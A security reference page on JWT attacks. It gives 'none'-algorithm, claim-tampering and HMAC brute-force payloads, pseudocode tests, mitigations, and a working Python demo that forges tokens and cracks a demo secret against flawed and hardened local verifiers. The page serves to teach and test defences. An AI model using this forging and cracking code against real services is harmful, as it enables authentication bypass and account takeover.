JWT
JWT Attacks
Description
JWT (JSON Web Token) attacks exploit weaknesses in how an application issues, verifies or stores JWTs, allowing an attacker to forge tokens, tamper with claims, or reuse a token the server should have rejected. A JWT is three base64url-encoded segments, header.payload.signature; every attack below targets the gap between what the header and payload claim and what the server actually verifies.
Example with Scenario
Scenario: A web application uses JWTs for user authentication. If the server accepts the algorithm named in the token header, or signs tokens with a guessable HMAC secret, an attacker can forge a token with arbitrary claims and gain unauthorized access. If tokens are stored where script can read them (for example localStorage), an XSS bug lets the attacker steal a valid token and replay it.
Payloads and Test Cases
Payloads
None Algorithm Attack (header; the token is sent as base64url(header).base64url(payload). with an empty signature, and case variants such as "None" or "NONE" should be tried as well):
{ "alg": "none" }
Brute Force HMAC Secret (a captured, legitimately signed token; the signature is the value cracked offline against a wordlist):
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "admin" }, "signature": "generated_signature" }
Claim Manipulation (the payload is edited, here to add an admin flag, while the original signature is kept or a forged one is attached):
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "attacker", "admin": true }, "signature": "generated_signature" }
Test Cases
None Algorithm Attack:
Payload:
{ "alg": "none" }
Test Case:
# Create an unsigned JWT whose header names the 'none' algorithm (pseudocode; createJWT, sendJWTToServer and checkAdminAccessGranted are placeholders for the tester's own helpers)
jwtToken = createJWT({"alg": "none"}, {"user": "admin"}, "")
# Send the token to the server
sendJWTToServer(jwtToken)
# Verify whether the server accepts the token without a signature
checkAdminAccessGranted()
Brute Force HMAC Secret:
Payload:
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "admin" }, "signature": "generated_signature" }
Test Case:
# Recover the HMAC secret offline by re-signing a captured token with each candidate from a wordlist until the signature matches (pseudocode; the helper names are placeholders)
secret = bruteForceSecret(capturedToken, wordlist)
# Mint a properly signed token with the recovered secret
jwtToken = createJWT({"alg": "HS256"}, {"user": "admin"}, secret)
# Send the token to the server
sendJWTToServer(jwtToken)
# Verify whether the server accepts the forged token
checkAdminAccessGranted()
Claim Manipulation:
Payload:
{ "header": { "alg": "HS256", "typ": "JWT" }, "payload": { "user": "attacker", "admin": true }, "signature": "generated_signature" }
Test Case:
# Edit the claims of a captured token and keep its original signature, to test whether the server verifies the signature at all or merely decodes the payload (pseudocode; the helper names are placeholders)
jwtToken = modifyClaims(capturedToken, {"user": "attacker", "admin": True})
# Send the token to the server
sendJWTToServer(jwtToken)
# Verify whether the server grants admin access on the tampered token
checkAdminAccessGranted()
Mitigation
Use Strong Secrets:
Use strong, random secrets for signing JWTs.
Avoid using weak or easily guessable secrets.
Validate Tokens Properly:
Always validate the token signature and claims.
Reject tokens with invalid or missing signatures.
Enforce Algorithm Constraints:
Pin the expected algorithm on the server side (e.g., HS256 or RS256) and never let the token header choose it.
Reject tokens with the 'none' algorithm in any casing, and when verifying with an asymmetric public key, reject tokens that switch to an HMAC algorithm.
Secure Token Storage:
Store JWTs on the client side where script cannot read them (e.g., HttpOnly, Secure cookies with a SameSite attribute, plus CSRF protection).
Avoid storing tokens in localStorage, sessionStorage or other places an XSS payload can read.
Implement Expiry and Revocation:
Implement token expiry and refresh mechanisms.
Provide a way to revoke tokens when necessary.
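The following is an added example, not code from the original page: a standard-library Python implementation of the three test cases above (none algorithm, offline HMAC brute force, claim tampering) run against two verifiers, a flawed one that trusts the token's own alg header and a hardened one that applies the mitigations listed here (pinned algorithm, mandatory signature check, mandatory exp). The secret, wordlist, claims and timestamp are constructed for the demo.

```python
"""Added example (not from the original page): forging HS256 / 'none' JWTs
and checking them against a flawed and a hardened verifier, stdlib only."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# Constructed demo values (assumptions for this example, not real secrets).
SERVER_SECRET = b"letmein123"
WORDLIST = [b"password", b"secret", b"letmein123", b"changeme"]


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()


def make_jwt(header: dict, payload: dict, secret: Optional[bytes]) -> str:
    """Build header.payload.signature; alg 'none' yields an empty signature."""
    signing_input = b".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode()).encode()
        for part in (header, payload)
    )
    if secret is None or header.get("alg", "").lower() == "none":
        sig = b""  # token ends with a trailing '.' and no signature
    else:
        sig = hs256_sign(signing_input, secret)
    return signing_input.decode() + "." + b64url_encode(sig)


def vulnerable_verify(token: str, secret: bytes) -> Optional[dict]:
    """Flawed verifier: lets the token header pick the algorithm."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg", "").lower() == "none":
        return json.loads(b64url_decode(p))  # accepts an unsigned token
    expected = hs256_sign(f"{h}.{p}".encode(), secret)
    if hmac.compare_digest(expected, b64url_decode(s)):
        return json.loads(b64url_decode(p))
    return None


def hardened_verify(token: str, secret: bytes, now: int) -> Optional[dict]:
    """Hardened verifier: algorithm pinned server-side, signature always
    checked, exp claim required and enforced."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":  # exact match; 'none'/'None' rejected
        return None
    expected = hs256_sign(f"{h}.{p}".encode(), secret)
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    payload = json.loads(b64url_decode(p))
    exp = payload.get("exp")
    if not isinstance(exp, int) or exp <= now:
        return None
    return payload


def brute_force_secret(token: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline secret recovery: re-sign the captured signing input with each
    candidate and compare against the real signature (no server requests)."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for candidate in wordlist:
        if hmac.compare_digest(hs256_sign(f"{h}.{p}".encode(), candidate), target):
            return candidate
    return None


def run_demo() -> dict:
    now = 1_700_000_000  # constructed 'current time' so exp checks are deterministic
    admin_claims = {"user": "admin", "admin": True, "exp": now + 3600}
    # A low-privilege token the server issued and the attacker captured.
    captured = make_jwt({"alg": "HS256", "typ": "JWT"},
                        {"user": "attacker", "admin": False, "exp": now + 3600},
                        SERVER_SECRET)
    # 1. 'none' algorithm: unsigned token asserting admin.
    none_token = make_jwt({"alg": "none", "typ": "JWT"}, admin_claims, None)
    # 2. Claim manipulation without the key: new payload, old signature kept.
    h, _, s = captured.split(".")
    tampered = f"{h}.{b64url_encode(json.dumps(admin_claims).encode())}.{s}"
    # 3. Crack the secret offline, then mint a correctly signed admin token.
    recovered = brute_force_secret(captured, WORDLIST)
    forged = make_jwt({"alg": "HS256", "typ": "JWT"}, admin_claims, recovered) if recovered else None
    return {
        "none_vulnerable": vulnerable_verify(none_token, SERVER_SECRET),
        "none_hardened": hardened_verify(none_token, SERVER_SECRET, now),
        "tampered_vulnerable": vulnerable_verify(tampered, SERVER_SECRET),
        "tampered_hardened": hardened_verify(tampered, SERVER_SECRET, now),
        "recovered_secret": recovered,
        "forged_vulnerable": vulnerable_verify(forged, SERVER_SECRET) if forged else None,
        "forged_hardened": hardened_verify(forged, SERVER_SECRET, now) if forged else None,
    }


if __name__ == "__main__":
    print(json.dumps({k: (v.decode() if isinstance(v, bytes) else v)
                      for k, v in run_demo().items()}, indent=2))
```

Two results are worth noting. The tampered token is rejected even by the flawed verifier, because claim manipulation only succeeds when the signature is skipped ('none') or re-created with the key. And the forged token minted with the cracked secret passes the hardened verifier too: algorithm pinning and signature checks cannot help once the HMAC secret is guessable, which is why the first mitigation above is a long, random secret.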